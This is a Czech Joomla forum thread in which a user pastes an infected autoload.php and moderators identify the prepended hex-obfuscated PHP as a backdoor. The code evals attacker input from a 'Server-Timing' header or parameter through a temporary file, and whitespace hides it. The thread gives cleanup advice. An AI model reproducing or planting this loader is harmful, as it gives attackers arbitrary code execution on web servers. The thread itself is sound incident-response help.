Přihlásit se

Joomla 5.2.2 Security & Bugfix Release

Joomla 5.2.2 je nyní k dispozici. Jedná se o bezpečnostní vydání pro Joomla 5.x.

nefunkční stránky

29. zář 2021 14:16 - 29. zář 2021 14:50 #144884
Odpověď od Jan
Uživatel
Na soubor autoload.php jsem se kouknul hned jako první, ale bohužel nemám znalosti, abych posoudil jestli je v pořádku. Rád bych ho porovnal s originálem, ale bez administračního rozhraní nevím jak zjistit přesnou verzi Joomla. V tom souboru je tohle:

<?php $_HEADERS = getallheaders();if(isset($_HEADERS)){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x53e\x72\x76e\x72\x2dT\x69\x6di\x6e\x67\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fH\x45\x41D\x45\x52S\x5b\x22S\x65\x72v\x65\x72-\x54\x69m\x69\x6eg\x22\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}


// autoload.php @generated by Composer

require_once __DIR__ . '/composer' . '/autoload_real.php';

return ComposerAutoloaderInit205c915b9c7d3e718e7c95793ee67ffe::getLoader();

29. zář 2021 14:24 #144885
Odpověď od Cony
Moderátor
A to tam právě nemá co dělat. Konkrétně u tohoto souboru se obsah nezměnil snad nikdy, takže lze porovnat z jakoukoliv verzí Joomly. Je to kód, kterým Vám na serveru spustí jakýkoliv kód. Štěstí v neštěstí máte v tom, že Váš server neumí funkcí getallheaders, proto to padá, místo aby to škodilo. I tak ale máte web zavirován.

29. zář 2021 14:31 - 29. zář 2021 14:34 #144886
Odpověď od Bong
Moderátor
Ten soubor by měl začínat:

Code:
<?php // autoload.php @generated by Composer require_once __DIR__ . '/composer/autoload_real.php';

řekl bych, že máte problém...

Verzi Joomly zjistíte třeba tak, že si obrazíte soubor: vasedomena.cz/administrator/manifests/files/joomla.xml

Hacknutou Joomlu opravíte takto:
www.bongovo.cz/joomla/40-jak-zachranit-hacknutou-joomlu

Joomlu opravíte takto:
www.joomlaportal.cz/jak-zacit/632-univer...ava-instalace-joomly
I'm sorry, my responses are limited...you must ask the right questions.

29. zář 2021 14:36 #144887
Odpověď od Jan
Uživatel
Tak super, aspoň už víme kde je chyba. Je tedy zajímavé, že část kodu se objevila až po klasickém zkopírování Ctrl C+V jinak vidět není. Tak já to zkusím dát do původního stavu a snad se to rozběhne. Zatím děkuji moc

29. zář 2021 22:28 #144898
Odpověď od Cony
Moderátor
Kód bude mít na začátku hromadu mezer, nebo tabelátorů, při rychlém náhledu je pak "za rohem" a není na první pohled vidět.

Každopádně je ale potřeba zjistit, jak k hacku došlo, vše aktualizovat, změnit všechny hesla, jinak to tam máte za chvíli zpět.

Pokud máte na webu uživatele, měl by jste také teoreticky informovat ÚOOZ o možném úniku dat uživatelů...

30. zář 2021 09:46 #144900
Odpověď od Ernst
Joomla Expert

Jan napsal: Existuje nějaký nástroj, kterým bych zkontroloval napadení webu? Děkuji


zkuste sitecheck.sucuri.net/

ale u vás to ani nedoběhne, tak je problém asi větší

Powered by Fórum

Novinky z diskuze Nejnovější příspěvky